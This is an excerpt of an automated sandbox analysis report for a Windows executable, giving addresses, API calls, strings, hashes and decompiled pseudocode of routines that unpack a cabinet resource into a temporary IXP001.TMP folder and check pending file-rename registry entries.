0x00000000
0x01085106
0x010850cd
0x010850d3
0x010850da
0x00000000
0x00000000
0x010850dd
0x010850e6
0x00000000
0x00000000
0x00000000
0x01085060
0x01085060
0x01085070
0x01085075
0x01085107
0x01085107
0x0108510e
0x01085111
0x01085117
0x01085117
0x0108511f
0x01085121
0x01085127
0x01085135
0x01085135
0x01085127
0x01085141
0x01085159
0x01085159
0x00000000
0x0108515f

APIs

Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
Part of subcall function 0108468F: SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
Part of subcall function 0108468F: LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
Part of subcall function 0108468F: LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
Part of subcall function 0108468F: memcpy_s.MSVCRT ref: 010846E5
Part of subcall function 0108468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01084FFE
LoadResource.KERNEL32(00000000,00000000), ref: 01085006
LockResource.KERNEL32(00000000), ref: 0108500D
GetDlgItem.USER32(00000000,00000842), ref: 01085030
ShowWindow.USER32(00000000), ref: 01085037
GetDlgItem.USER32(00000841,00000005), ref: 0108504A
ShowWindow.USER32(00000000), ref: 01085051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 01085111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 01085159

Strings

*MEMCAB, xrefs: 010850C7
CABINET, xrefs: 01084FE6, 01084FF7

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: a63b95889ad9c103a38367d89be3f018c727df2f56c7dc0dcf8cb6f428c6de5d
Instruction ID: 6a9b587911a8d20f957cc401f3a57f6082f100f0a55cf8b2e4e555fb77577d02
Opcode Fuzzy Hash: a63b95889ad9c103a38367d89be3f018c727df2f56c7dc0dcf8cb6f428c6de5d
Instruction Fuzzy Hash: EA311E7074C302BFEB307A569C89F7F369DA744758F044069F9C1E6685DA7E8C018B64

Uniqueness

Uniqueness Score: -1.00%

Function 010853A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010853A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0108171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E01081680(_t32, 0x104, _t20);
					E0108658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E01086CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x1088a20 = 1;
				goto L5;
			}

0x010853ac
0x010853b3
0x010853b9
0x010853bb
0x010853bd
0x010853bf
0x010853d1
0x010853d6
0x010853e0
0x010853e2
0x010853f5
0x010853fb
0x01085402
0x0108540b
0x00000000
0x00000000
0x01085413
0x00000000
0x00000000
0x01085415
0x01085416
0x01085427
0x0108542a
0x0108542b
0x01085434
0x01085434
0x0108543a
0x0108544c
0x0108544c
0x01085452
0x0108545a
0x00000000
0x00000000
0x0108545e
0x0108545f
0x00000000

APIs

Part of subcall function 0108171E: _vsnprintf.MSVCRT ref: 01081750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010853FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01085402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01085434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01085452

Strings

IXP, xrefs: 01085419
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010853B7, 010853E1, 0108541E
IXP%03d.TMP, xrefs: 010853C0

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2310010875
Opcode ID: 0720000ae2d41645f4663d1d6c41a2fd58be963a82067353da1ee915cc155bc5
Instruction ID: 10a2e32ab115b1189d24be5af1dab0873b05cf2945ab7be320526b6d6cd565b3
Opcode Fuzzy Hash: 0720000ae2d41645f4663d1d6c41a2fd58be963a82067353da1ee915cc155bc5
Instruction Fuzzy Hash: 0311E97170810467D720BB269C48FDF765DDFD5315F004066B6C693680CE7949438761

Uniqueness

Uniqueness Score: -1.00%

Function 01085467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E01085467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x10891e4;
					_t42 = 0x104;
					E01081680(0x10891e4, 0x104);
					L14:
					_t13 = E010858C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x1089124 = 0;
							_t14 = 1;
							L24:
							return E01086CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0108597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x1088a20; // 0x0
						if(_t61 != 0) {
							 *0x1088a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x1089124 = E01086285();
						goto L22;
					}
					 *0x1088a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E010853A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x10891e4;
				E01081781(0x10891e4, 0x104, __ecx,  &_v268);
				if(( *0x1089a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0108658A(_t48, 0x104, 0x1081140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0108658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x01085472
0x01085479
0x01085481
0x01085484
0x0108551c
0x01085521
0x01085528
0x0108552d
0x0108552f
0x01085539
0x0108554d
0x0108554d
0x01085552
0x01085585
0x01085585
0x0108558b
0x0108558d
0x0108559d
0x0108559d
0x01085557
0x0108555e
0x00000000
0x00000000
0x01085560
0x01085566
0x01085569
0x0108556f
0x0108556f
0x01085581
0x01085581
0x00000000
0x01085581
0x01085545
0x0108557c
0x00000000
0x0108557c
0x01085547
0x00000000
0x01085547
0x0108548a
0x01085490
0x01085497
0x00000000
0x00000000
0x0108549d
0x010854ab
0x010854b4
0x010854c0
0x0108550c
0x01085511
0x01085515
0x00000000
0x01085515
0x010854c9
0x010854d6
0x010854d8
0x010854fe
0x01085503
0x01085507
0x00000000
0x01085507
0x010854da
0x010854dd
0x010854f7
0x00000000
0x010854f7
0x010854df
0x010854e2
0x010854f0
0x00000000
0x010854f0
0x010854e7
0x00000000
0x00000000
0x010854e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010854C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108556F

Part of subcall function 010853A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010853FB
Part of subcall function 010853A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01085402
Part of subcall function 010853A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108541F
Part of subcall function 010853A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108542B
Part of subcall function 010853A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01085434

Strings

mips, xrefs: 010854F7
ppc, xrefs: 010854E9
alpha, xrefs: 010854F0
i386, xrefs: 010854FE
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 0108547D, 01085481, 010854AB, 0108551C, 0108553C, 01085568

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-1000730752
Opcode ID: ffde9284955c79c1e9abf24c89855a81cd9d2e17b5204a083d57c734869704fa
Instruction ID: f4d6f27a6f8d28a25bdfca0187e619a6aec70d57c047ad7e1d432a1cfeff633e
Opcode Fuzzy Hash: ffde9284955c79c1e9abf24c89855a81cd9d2e17b5204a083d57c734869704fa
Instruction Fuzzy Hash: A3313870B0C6019BDF60BB2E9C545BFBBDAAF91244B0440BAA9C1C7544DF758A0287A4

Uniqueness

Uniqueness Score: -1.00%

Function 0108256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0108256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E010824E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x01082572
0x01082573
0x01082575
0x01082578
0x0108257d
0x01082627
0x01082583
0x01082586
0x01082589
0x010825eb
0x01082607
0x00000000
0x01082609
0x0108261a
0x00000000
0x0108261a
0x00000000
0x0108258b
0x0108258b
0x0108259e
0x010825b2
0x010825ba
0x010825cb
0x010825d1
0x010825d6
0x010825da
0x010825dd
0x010825dd
0x010825e3
0x010825e3
0x010825e3
0x0108258b
0x01082589
0x0108262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,01084096,01084096,?,01081ED3,00000001,00000000,?,?,01084137,?), ref: 010825B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,01084096,?,01081ED3,00000001,00000000,?,?,01084137,?,01084096), ref: 010825CB
RegCloseKey.KERNELBASE(?,?,01081ED3,00000001,00000000,?,?,01084137,?,01084096), ref: 010825DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,01084096,01084096,?,01081ED3,00000001,00000000,?,?,01084137,?), ref: 010825FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,01084096,00000000,00000000,00000000,00000000,?,01081ED3,00000001,00000000), ref: 0108261A

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010825F5
PendingFileRenameOperations, xrefs: 010825C3
System\CurrentControlSet\Control\Session Manager, xrefs: 010825A8

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 94464239a3b62e15a4da8c50c9e4e6be427e5e6bc87b895ce037db745068c5f2
Instruction ID: 3347562c56f9a8cd0055247fec909e108e47f88e158aa5045e779b1bbce7bfc4
Opcode Fuzzy Hash: 94464239a3b62e15a4da8c50c9e4e6be427e5e6bc87b895ce037db745068c5f2
Instruction Fuzzy Hash: 9211863594A228FB9B30AB969C09DFF7FBCDF057A1F504096B9C9A2100D6354A45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01086A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E01087155();
				_push(0x58);
				_push(0x10872b8);
				E01087208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x10888b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x10888b0; // 0x2
						if(__eflags != 0) {
							 *0x10881e4 = _t58;
							goto L13;
						} else {
							 *0x10888b0 = _t58;
							_t37 = E01086C3F(0x10810b8, 0x10810c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L01086FF4();
						L13:
						_t68 =  *0x10888b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x10810b4);
							_push(0x10810ac);
							L01087202();
							 *0x10888b0 = 2;
						}
						if(_t53 == 0) {
							 *0x10888ac = 0;
						}
						_t71 =  *0x10888b4;
						if( *0x10888b4 != 0 && E01087060(_t71, 0x10888b4) != 0) {
							_t60 =  *0x10888b4; // 0x0
							 *0x108a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E01082BFB(0x1080000, 0, _t59); // executed
							 *0x10881e0 = _t30;
							__eflags =  *0x10881f8;
							if( *0x10881f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x10881e4;
							if( *0x10881e4 == 0) {
								__imp___cexit();
								_t30 =  *0x10881e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0108724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x01086a60
0x01086a6a
0x01086a6c
0x01086a71
0x01086a78
0x01086a7f
0x01086a85
0x01086a8e
0x01086a91
0x01086a93
0x01086a9c
0x01086aa2
0x00000000
0x00000000
0x01086aa6
0x01086ab4
0x00000000
0x01086aa8
0x01086aaa
0x01086aab
0x01086aab
0x01086abf
0x01086abf
0x01086ac5
0x01086ad1
0x01086ad7
0x01086b05
0x00000000
0x01086ad9
0x01086ad9
0x01086ae9
0x01086af0
0x01086af2
0x00000000
0x01086af4
0x01086af4
0x01086afb
0x01086afb
0x01086af2
0x01086ac7
0x01086ac7
0x01086ac9
0x01086b0b
0x01086b0b
0x01086b11
0x01086b13
0x01086b18
0x01086b1d
0x01086b24
0x01086b24
0x01086b30
0x01086b39
0x01086b39
0x01086b3b
0x01086b42
0x01086b57
0x01086b5f
0x01086b65
0x01086b65
0x01086b67
0x01086b6c
0x01086b6e
0x01086b71
0x01086b74
0x01086b74
0x01086b79
0x00000000
0x00000000
0x01086b7d
0x01086b81
0x00000000
0x00000000
0x01086b83
0x01086b8c
0x01086b8d
0x01086b90
0x01086b90
0x01086b83
0x01086b81
0x01086b94
0x01086b98
0x01086ba2
0x01086b9a
0x01086b9a
0x01086b9a
0x01086ba3
0x01086bab
0x01086bb0
0x01086bb5
0x01086bbc
0x01086bbf
0x00000000
0x01086bbf
0x01086c1e
0x01086c25
0x01086c27
0x01086c2d
0x01086c2d
0x01086c32
0x00000000
0x01086bc5
0x01086bc5
0x01086bc8
0x01086bcc
0x01086bce
0x01086bce
0x01086bd1
0x01086bd3
0x01086bd3
0x01086bd6
0x01086bda
0x01086be1
0x01086be3
0x01086be5
0x01086be5
0x01086be6
0x01086be6
0x01086be9
0x01086bea
0x01086bea
0x01086b74
0x01086c39
0x01086c3e
0x01086c3e
0x01086abe
0x01086abe
0x00000000

APIs

Part of subcall function 01087155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01087182
Part of subcall function 01087155: GetCurrentProcessId.KERNEL32 ref: 01087191
Part of subcall function 01087155: GetCurrentThreadId.KERNEL32 ref: 0108719A
Part of subcall function 01087155: GetTickCount.KERNEL32 ref: 010871A3
Part of subcall function 01087155: QueryPerformanceCounter.KERNEL32(?), ref: 010871B8

GetStartupInfoW.KERNEL32(?,010872B8,00000058), ref: 01086A7F
Sleep.KERNEL32(000003E8), ref: 01086AB4
_amsg_exit.MSVCRT ref: 01086AC9
_initterm.MSVCRT ref: 01086B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 01086B49
exit.KERNELBASE ref: 01086BBF
_ismbblead.MSVCRT ref: 01086BDA

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 7fd8d5affdcf8eef4c855ef2d9f164b52b2264ee019f536dc0d78adbc31f1aaa
Instruction ID: 3f318b3be2f42c5b731eca4cd5bc3351c0691ebb5108f03780de12392f4d098f
Opcode Fuzzy Hash: 7fd8d5affdcf8eef4c855ef2d9f164b52b2264ee019f536dc0d78adbc31f1aaa
Instruction Fuzzy Hash: 2341E530A4C325CFDB71BB6DE8447AE7BE4BB44724F56806BE9C197284CB7A4481CB80

Uniqueness

Uniqueness Score: -1.00%

Function 010858C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010858C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E01081680(_t20, _t36, _t33);
					E0108658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x1089124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E010844B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x1089124 = E01086285();
					_t14 = 0;
				}
				return _t14;
			}

0x010858cd
0x010858d1
0x010858d3
0x010858d5
0x010858d8
0x010858d8
0x010858da
0x010858db
0x010858e1
0x010858ed
0x010858f1
0x0108591e
0x0108592c
0x01085943
0x0108594a
0x0108594d
0x01085953
0x01085959
0x00000000
0x0108595b
0x0108595c
0x01085963
0x0108596c
0x00000000
0x01085972
0x01085974
0x0108597a
0x0108597a
0x0108596c
0x010858f3
0x01085901
0x01085906
0x0108590b
0x01085910
0x01085910
0x01085918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01085534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010858E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01085534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01085943
LocalFree.KERNEL32(00000000,?,01085534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108594D
CloseHandle.KERNEL32(00000000,?,01085534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0108595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01085534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01085963

Strings

TMP4351$.TMP, xrefs: 01085923
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010858CD, 010858CF, 01085919, 01085962

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
